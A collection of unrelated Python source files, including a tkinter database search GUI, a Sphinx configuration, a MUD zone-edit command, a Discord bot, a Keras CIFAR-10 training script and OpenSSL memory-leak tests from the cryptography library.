% (TABLENAME, CARPLA, CARPLA, CARPLA, CARPLA, CARPLA)
# print(sql)
try:
# 执行SQL语句
cursor.execute(sql)
# 获取所有记录列表
results = cursor.fetchall()
for row in results:
row2 = str(row) + "\n"
self.t.insert('1.0', row2)
self.t.insert('1.0', "-----------------------------"
"------------------------------"
"------------------------------"
"--------\n")
# print(row)
# print(results)
except:
return 0
# 关闭数据库连接
db.close()
def center_window(self):
screenwidth = search.winfo_screenwidth()
screenheight = search.winfo_screenheight()
search.update()
width = search.winfo_width()
height = search.winfo_height()
size = '+%d+%d' % ((screenwidth - width)/2, (screenheight - height)/2)
search.geometry(size)
def close_window():
print("search destroy")
search.destroy()
if __name__ == '__main__':
search = tk.Tk()
search2 = Search(search)
# close,退出输出destroy
search.protocol('WM_DELETE_WINDOW', close_window)
# 进入消息循环
search.mainloop()
|
#
# needs test docs documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 28 11:37:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../../sphinxcontrib"))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinxcontrib.needs", "sphinxcontrib.plantuml"]
needs_types = [
{"directive": "story", "title": "User Story", "prefix": "US_", "color": "#BFD8D2", "style": "node"},
{"directive": "spec", "title": "Specification", "prefix": "SP_", "color": "#FEDCD2", "style": "node"},
{"directive": "impl", "title": "Implementation", "prefix": "IM_", "color": "#DF744A", "style": "node"},
{"directive": "test", "title": "Test Case", "prefix": "TC_", "color": "#DCB239", "style": "node"},
]
needs_extra_links = [
{
"option": "links",
"incoming": "is linked by",
"outgoing": "links to",
"copy": False,
"style": "#black",
"style_part": "dotted,#black",
},
{
"option": "blocks",
"incoming": "is blocked by",
"outgoing": "blocks",
"copy": True,
"style": "bold,#AA0000",
},
{
"option": "tests",
"incoming": "is tested by",
"outgoing": "tests",
"copy": False,
"style": "dashed,#00AA00",
"style_part": "dotted,#00AA00",
},
]
needs_flow_link_types = ["links", "tests"]
plantuml = "java -jar %s" % os.path.join(os.path.dirname(__file__), "..", "utils", "plantuml.jar")
plantuml_output_format = "svg"
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "needs test docs"
copyright = "2017, team useblocks"
author = "team useblocks"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "1.0"
# The full version, including alpha/beta/rc tags.
release = "1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "needstestdocsdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "needstestdocs.tex", "needs test docs Documentation", "team useblocks", "manual"),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "needstestdocs", "needs test docs Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"needstestdocs",
"needs test docs Documentation",
author,
"needstestdocs",
"One line description of project.",
"Miscellaneous",
),
]
|
"""
cmdZedit.py
Author: Fletcher Haynes
This command allows editing of room attributes.
"""
import MudCommand
import MudWorld
import string
import os
class cmdZedit(MudCommand.MudCommand):
def __init__(self):
MudCommand.MudCommand.__init__(self)
self.info['cmdName'] = "zedit"
self.info['helpText'] = '''Lets you edit the zone attributes.'''
self.info['useExample'] = '''zedit (addlogic, dellogic)'''
def process(self, player, args=''):
# Let's split the args up. We only want to split it once, as the
# parameter will always be one word, whereas the value might be
# more than one. Such as: Zedit name Room of Superdeath.
argList = args.split(" ", 1)
# We always want 2 pieces of text. If there is only one, then
# they didn't include a value.
if len(argList) != 2:
player.writeWithPrompt("Proper format is: zedit field value.")
return
# Let's get the zone reference...
# TODO: Do we want to allow them to edit zone names? That will require
# deleting the old file, and rewriting the zone index. Not too hard,
# but I am not sure I want to allow that. It might be safer to force
# them to use delzone?
z = player.getZoneRef()
if argList[0].lower() == 'addlogic':
try:
name, logic = MudWorld.world.logicDb.getLogic(argList[1])
r.addLogic(name, logic)
player.writeWithPrompt("Logic module added to zone.")
return
except:
player.writeWithPrompt("That logic module is not attached to this zone.")
return
elif argList[0].lower() == 'dellogic':
try:
r.removeLogic(argList[1])
except KeyError:
player.writeWithPrompt("That logic module is not attached to this zone.")
return
else:
player.writeWithPrompt("That is not a valid field to edit.")
return
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `revisiondict` package."""
import sys
from revisiondict import RevisionDict
if sys.version_info[0] < 3:
from test import util_mapping_py2 as util_mapping
else:
from test import util_mapping_py3 as util_mapping
class RevisionDictMappingTest(util_mapping.TestMappingProtocol):
# test compatability with MappingProtocol
type2test = RevisionDict
|
import os
import urllib.request
# PREWORK
#DICTIONARY = os.path.join('/tmp', 'dictionary.txt')
#urllib.request.urlretrieve('http://bit.ly/2iQ3dlZ', DICTIONARY)
DICTIONARY = '../../day020/bite_065_Get_all_valid_dictionary_words_for_a_draw_of_letters/dictionary.txt'
scrabble_scores = [(1, "E A O I N R T L S U"), (2, "D G"), (3, "B C M P"),
(4, "F H V W Y"), (5, "K"), (8, "J X"), (10, "Q Z")]
LETTER_SCORES = {letter: score for score, letters in scrabble_scores
for letter in letters.split()}
# start coding
def load_words():
"""load the words dictionary (DICTIONARY constant) into a list and return it"""
with open(DICTIONARY) as f:
return [word.strip() for word in f.read().split()]
def calc_word_value(word):
"""given a word calculate its value using LETTER_SCORES"""
word_value = 0
for letter in word:
word_value += LETTER_SCORES[letter.upper()]
return word_value
def max_word_value(words=None):
"""given a list of words return the word with the maximum word value"""
max_word_value = 0
max_word = ''
for word in words:
word_value = calc_word_value(word)
if word_value > max_word_value:
max_word_value = word_value
max_word = word
return max_word
|
from colorama import Fore
from config import token, prefix, dev_mode
from helpers import print, parse, get_server_actions
import actions
import actions.readme
import actions.settings
import actions.propose_command
import discord
import math
if dev_mode:
import importlib
client = discord.Client()
@client.event
async def on_guild_join(guild):
print("Joined guild", guild)
@client.event
async def on_guild_update(old_guild, new_guild):
print("Guild was updated", old_guild, "=>", new_guild)
@client.event
async def on_guild_remove(guild):
print("Left guild", guild)
@client.event
async def on_member_ban(guild, user):
print("Guild", guild, "banned", user)
@client.event
async def on_message(message: discord.Message):
if message.author == client.user:
return
if not message.content.startswith(prefix) or len(message.content) < 1:
return
command, channel, params, mentions, author = parse(message)
if dev_mode:
importlib.reload(actions)
if command in get_server_actions(channel.guild.id)[0].keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing Server Command {command} {author.name}#{author.discriminator}: \"{message.content}\"")
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await get_server_actions(channel.guild.id)[0][command].execute(message)
elif command in actions.command_actions.keys():
print(f"[{Fore.LIGHTBLUE_EX}{message.guild.name:20}{Fore.RESET}] Executing {command} {author.name}#{author.discriminator}: \"{message.content}\"")
if command in actions.readme.commands:
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Sending readme ({len(actions.actions)} actions)")
inline = True
if len(params) != 0:
if params[0] == '0' or params[0] == 'short':
inline = True
elif params[0] == '1' or params[0] == 'long':
inline = False
embed = discord.Embed()
embed.title = f"Liste der Befehle 1/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
page_itr = 1
for action in actions.actions:
cmd_append = ""
if 'readme' in action.commands:
cmd_append = " [Optional: Stil 0 (Default) / 1]"
elif action.requires_mention:
cmd_append = " [Person]"
elif action.accepts_mention:
cmd_append = " [Optional: Person]"
joined_commands = ' / '.join(action.commands)
joined_commands = (joined_commands[:50] + '..') if len(joined_commands) > 75 else joined_commands
embed.add_field(name='**' + joined_commands + cmd_append + '**', value=action.description, inline=inline)
itr += 1
if itr == 24:
page_itr += 1
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
embed = discord.Embed()
embed.title = f"Liste der Befehle {page_itr}/{math.ceil(len(actions.actions) / 24)}"
embed.description = 'Prefix: ' + prefix
itr = 0
if len(embed.fields) != 0:
print(f"Sending \"{embed.title}\"")
await channel.send(embed=embed)
elif command in actions.settings.commands:
print("Sending settings:", params)
if len(params) > 0:
pass
else:
await channel.send("Coming soon™")
# embed = discord.Embed()
# embed.title = "Mögliche Einstellungen"
# embed.description = 'Prefix: ' + prefix + 'settings [Einstellung]'
# for setting_name in actions.settings.settings:
# embed.add_field(name='**' + ' / '.join(setting_name) + '**', value=actions.settings.settings[setting_name])
# await channel.send(embed=embed)
elif command in actions.propose_command.commands:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message, client)
else:
class ChannelWrapper:
def __init__(self, original):
self.original = original
async def send(self, content=None, *, tts=False, embed: discord.Embed=None, file=None, files=None, delete_after=None, nonce=None):
if embed is not None:
embed.colour = discord.Colour.from_rgb(156, 52, 137)
return await self.original.send(content=content, tts=tts, embed=embed, file=file, files=files, delete_after=delete_after, nonce=nonce)
message.channel = ChannelWrapper(message.channel)
await actions.command_actions[command].execute(message)
@client.event
async def on_ready():
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Started")
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Name:", client.user.name)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Id:", client.user.id)
print(f"[{Fore.MAGENTA}{'System':20}{Fore.RESET}] Current guilds (max 25):", [x["name"] for x in await client.fetch_guilds().get_guilds(25)])
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='+help'))
client.run(token)
|
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.vgg16 import VGG16
from keras.applications.vgg19 import VGG19
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 64
args_lr = 0.0008
args_model = 'vgg16'
epoch_begin_time = 0
job_name = sys.argv[0].split('.')[0]
save_files = '/scratch/li.baol/checkpoint_final4_3level/' + job_name + '*'
total_epochs = 49
starting_epoch = 0
# first step is to update the PID
pid = os.getpid()
message = job_name + ' pid ' + str(pid) # 'job50 pid 3333'
send_signal.send(args.node, 10002, message)
if args.resume:
save_file = glob.glob(save_files)[0]
# epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
print('resume from checkpoint')
message = job_name + ' b_end'
send_signal.send(args.node, 10002, message)
model = keras.models.load_model(save_file)
message = job_name + ' c_end'
send_signal.send(args.node, 10002, message)
else:
print('train from start')
model = models.Sequential()
if '16' in args_model:
base_model = VGG16(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
elif '19' in args_model:
base_model = VGG19(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
#base_model.summary()
#pdb.set_trace()
model.add(base_model)
model.add(layers.Flatten())
model.add(layers.BatchNormalization())
model.add(layers.Dense(128, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(64, activation='relu'))#, kernel_initializer='he_uniform'))
#model.add(layers.Dropout(0.2))
model.add(layers.BatchNormalization())
model.add(layers.Dense(10, activation='softmax'))#, kernel_initializer='he_uniform'))
model.compile(loss='categorical_crossentropy',
optimizer=Adam(lr=args_lr),
metrics=['accuracy'])
#model.summary()
print(model_type)
#pdb.set_trace()
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
# first record the wasted epoch time
global epoch_begin_time
if epoch_begin_time == 0:
epoch_waste_time = 0
else:
epoch_waste_time = int(time.time() - epoch_begin_time)
message = job_name + ' waste ' + str(epoch_waste_time) # 'job50 waste 100'
if epoch_waste_time > 0:
send_signal.send(args.node, 10002, message)
print('checkpointing the model triggered by kill -15 signal')
# delete whatever checkpoint that already exists
for f in glob.glob(save_files):
os.remove(f)
model.save('/scratch/li.baol/checkpoint_final4_3level/' + job_name + '_' + str(current_epoch) + '.h5')
print ('(SIGTERM) terminating the process')
message = job_name + ' checkpoint'
send_signal.send(args.node, 10002, message)
sys.exit()
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
first_epoch_start = 0
class PrintEpoch(keras.callbacks.Callback):
def on_epoch_begin(self, epoch, logs=None):
global current_epoch, first_epoch_start
#remaining_epochs = epochs - epoch
current_epoch = epoch
print('current epoch ' + str(current_epoch))
global epoch_begin_time
epoch_begin_time = time.time()
if epoch == starting_epoch and args.resume:
first_epoch_start = time.time()
message = job_name + ' d_end'
send_signal.send(args.node, 10002, message)
elif epoch == starting_epoch:
first_epoch_start = time.time()
if epoch == starting_epoch:
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
def on_epoch_end(self, epoch, logs=None):
if epoch == starting_epoch:
first_epoch_time = int(time.time() - first_epoch_start)
message = job_name + ' 1st_epoch ' + str(first_epoch_time)
send_signal.send(args.node, 10002, message)
progress = round((epoch+1) / round(total_epochs/2), 2)
message = job_name + ' completion ' + str(progress)
send_signal.send(args.node, 10002, message)
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=round(total_epochs/2),
validation_data=(x_test, y_test),
shuffle=True,
callbacks=callbacks,
initial_epoch=starting_epoch,
verbose=1
)
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import json
import os
import subprocess
import sys
import textwrap
import pytest
from cryptography.hazmat.bindings.openssl.binding import Binding
MEMORY_LEAK_SCRIPT = """
import sys
def main(argv):
import gc
import json
import cffi
from cryptography.hazmat.bindings._openssl import ffi, lib
heap = {}
BACKTRACE_ENABLED = False
if BACKTRACE_ENABLED:
backtrace_ffi = cffi.FFI()
backtrace_ffi.cdef('''
int backtrace(void **, int);
char **backtrace_symbols(void *const *, int);
''')
backtrace_lib = backtrace_ffi.dlopen(None)
def backtrace():
buf = backtrace_ffi.new("void*[]", 24)
length = backtrace_lib.backtrace(buf, len(buf))
return (buf, length)
def symbolize_backtrace(trace):
(buf, length) = trace
symbols = backtrace_lib.backtrace_symbols(buf, length)
stack = [
backtrace_ffi.string(symbols[i]).decode()
for i in range(length)
]
lib.Cryptography_free_wrapper(symbols, backtrace_ffi.NULL, 0)
return stack
else:
def backtrace():
return None
def symbolize_backtrace(trace):
return None
@ffi.callback("void *(size_t, const char *, int)")
def malloc(size, path, line):
ptr = lib.Cryptography_malloc_wrapper(size, path, line)
heap[ptr] = (size, path, line, backtrace())
return ptr
@ffi.callback("void *(void *, size_t, const char *, int)")
def realloc(ptr, size, path, line):
if ptr != ffi.NULL:
del heap[ptr]
new_ptr = lib.Cryptography_realloc_wrapper(ptr, size, path, line)
heap[new_ptr] = (size, path, line, backtrace())
return new_ptr
@ffi.callback("void(void *, const char *, int)")
def free(ptr, path, line):
if ptr != ffi.NULL:
del heap[ptr]
lib.Cryptography_free_wrapper(ptr, path, line)
result = lib.Cryptography_CRYPTO_set_mem_functions(malloc, realloc, free)
assert result == 1
# Trigger a bunch of initialization stuff.
from cryptography.hazmat.backends.openssl.backend import backend
start_heap = set(heap)
func(*argv[1:])
gc.collect()
gc.collect()
gc.collect()
if lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER:
lib.OSSL_PROVIDER_unload(backend._binding._legacy_provider)
lib.OSSL_PROVIDER_unload(backend._binding._default_provider)
if lib.Cryptography_HAS_OPENSSL_CLEANUP:
lib.OPENSSL_cleanup()
# Swap back to the original functions so that if OpenSSL tries to free
# something from its atexit handle it won't be going through a Python
# function, which will be deallocated when this function returns
result = lib.Cryptography_CRYPTO_set_mem_functions(
ffi.addressof(lib, "Cryptography_malloc_wrapper"),
ffi.addressof(lib, "Cryptography_realloc_wrapper"),
ffi.addressof(lib, "Cryptography_free_wrapper"),
)
assert result == 1
remaining = set(heap) - start_heap
if remaining:
sys.stdout.write(json.dumps(dict(
(int(ffi.cast("size_t", ptr)), {
"size": heap[ptr][0],
"path": ffi.string(heap[ptr][1]).decode(),
"line": heap[ptr][2],
"backtrace": symbolize_backtrace(heap[ptr][3]),
})
for ptr in remaining
)))
sys.stdout.flush()
sys.exit(255)
main(sys.argv)
"""
def assert_no_memory_leaks(s, argv=[]):
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
# When using pytest-cov it attempts to instrument subprocesses. This
# causes the memleak tests to raise exceptions.
# we don't need coverage so we remove the env vars.
env.pop("COV_CORE_CONFIG", None)
env.pop("COV_CORE_DATAFILE", None)
env.pop("COV_CORE_SOURCE", None)
argv = [
sys.executable,
"-c",
"{}\n\n{}".format(s, MEMORY_LEAK_SCRIPT),
] + argv
# Shell out to a fresh Python process because OpenSSL does not allow you to
# install new memory hooks after the first malloc/free occurs.
proc = subprocess.Popen(
argv,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
assert proc.stdout is not None
assert proc.stderr is not None
try:
proc.wait()
if proc.returncode == 255:
# 255 means there was a leak, load the info about what mallocs
# weren't freed.
out = json.loads(proc.stdout.read().decode())
raise AssertionError(out)
elif proc.returncode != 0:
# Any exception type will do to be honest
raise ValueError(proc.stdout.read(), proc.stderr.read())
finally:
proc.stdout.close()
proc.stderr.close()
def skip_if_memtesting_not_supported():
return pytest.mark.skipif(
not Binding().lib.Cryptography_HAS_MEM_FUNCTIONS,
reason="Requires OpenSSL memory functions (>=1.1.0)",
)
@pytest.mark.skip_fips(reason="FIPS self-test sets allow_customize = 0")
@skip_if_memtesting_not_supported()
class TestAssertNoMemoryLeaks(object):
def test_no_leak_no_malloc(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
pass
"""
)
)
def test_no_leak_free(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import Binding
b = Binding()
name = b.lib.X509_NAME_new()
b.lib.X509_NAME_free(name)
"""
)
)
def test_no_leak_gc(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import Binding
b = Binding()
name = b.lib.X509_NAME_new()
b.ffi.gc(name, b.lib.X509_NAME_free)
"""
)
)
def test_leak(self):
with pytest.raises(AssertionError):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.bindings.openssl.binding import (
Binding
)
b = Binding()
b.lib.X509_NAME_new()
"""
)
)
def test_errors(self):
with pytest.raises(ValueError):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
raise ZeroDivisionError
"""
)
)
@pytest.mark.skip_fips(reason="FIPS self-test sets allow_customize = 0")
@skip_if_memtesting_not_supported()
class TestOpenSSLMemoryLeaks(object):
@pytest.mark.parametrize(
"path", ["x509/PKITS_data/certs/ValidcRLIssuerTest28EE.crt"]
)
def test_der_x509_certificate_extensions(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_der_x509_certificate(
f.read(), backend
)
cert.extensions
"""
),
[path],
)
@pytest.mark.parametrize("path", ["x509/cryptography.io.pem"])
def test_pem_x509_certificate_extensions(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_pem_x509_certificate(
f.read(), backend
)
cert.extensions
"""
),
[path],
)
def test_x509_csr_extensions(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
private_key = rsa.generate_private_key(
key_size=2048, public_exponent=65537, backend=backend
)
cert = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([])
).add_extension(
x509.OCSPNoCheck(), critical=False
).sign(private_key, hashes.SHA256(), backend)
cert.extensions
"""
)
)
def test_ec_private_numbers_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.asymmetric import ec
ec.EllipticCurvePrivateNumbers(
private_value=int(
'280814107134858470598753916394807521398239633534281633982576099083'
'35787109896602102090002196616273211495718603965098'
),
public_numbers=ec.EllipticCurvePublicNumbers(
curve=ec.SECP384R1(),
x=int(
'10036914308591746758780165503819213553101287571902957054148542'
'504671046744460374996612408381962208627004841444205030'
),
y=int(
'17337335659928075994560513699823544906448896792102247714689323'
'575406618073069185107088229463828921069465902299522926'
)
)
).private_key(backend)
"""
)
)
def test_ec_derive_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.asymmetric import ec
ec.derive_private_key(1, ec.SECP256R1(), backend)
"""
)
)
def test_x25519_pubkey_from_private_key(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography.hazmat.primitives.asymmetric import x25519
private_key = x25519.X25519PrivateKey.generate()
private_key.public_key()
"""
)
)
def test_create_ocsp_request(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.x509 import ocsp
import cryptography_vectors
path = "x509/PKITS_data/certs/ValidcRLIssuerTest28EE.crt"
with cryptography_vectors.open_vector_file(path, "rb") as f:
cert = x509.load_der_x509_certificate(
f.read(), backend
)
builder = ocsp.OCSPRequestBuilder()
builder = builder.add_certificate(
cert, cert, hashes.SHA1()
).add_extension(x509.OCSPNonce(b"0000"), False)
req = builder.build()
"""
)
)
@pytest.mark.parametrize(
"path",
["pkcs12/cert-aes256cbc-no-key.p12", "pkcs12/cert-key-aes256cbc.p12"],
)
def test_load_pkcs12_key_and_certificates(self, path):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func(path):
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives.serialization import pkcs12
import cryptography_vectors
with cryptography_vectors.open_vector_file(path, "rb") as f:
pkcs12.load_key_and_certificates(
f.read(), b"cryptography", backend
)
"""
),
[path],
)
def test_create_crl_with_idp(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import datetime
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID
key = ec.generate_private_key(ec.SECP256R1(), backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
idp = x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value=u"PyCA")
]),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
)
builder = x509.CertificateRevocationListBuilder().issuer_name(
x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography.io CA"
)
])
).last_update(
last_update
).next_update(
next_update
).add_extension(
idp, True
)
crl = builder.sign(key, hashes.SHA256(), backend)
crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
)
"""
)
)
def test_create_certificate_with_extensions(self):
assert_no_memory_leaks(
textwrap.dedent(
"""
def func():
import datetime
from cryptography import x509
from cryptography.hazmat.backends.openssl import backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import (
AuthorityInformationAccessOID, ExtendedKeyUsageOID, NameOID
)
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
not_valid_before = datetime.datetime.now()
not_valid_after = not_valid_before + datetime.timedelta(days=365)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.OCSP,
x509.UniformResourceIdentifier(u"http://ocsp.domain.com")
),
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.UniformResourceIdentifier(u"http://domain.com/ca.crt")
)
])
sans = [u'*.example.org', u'foobar.example.net']
san = x509.SubjectAlternativeName(list(map(x509.DNSName, sans)))
ski = x509.SubjectKeyIdentifier.from_public_key(
private_key.public_key()
)
eku = x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
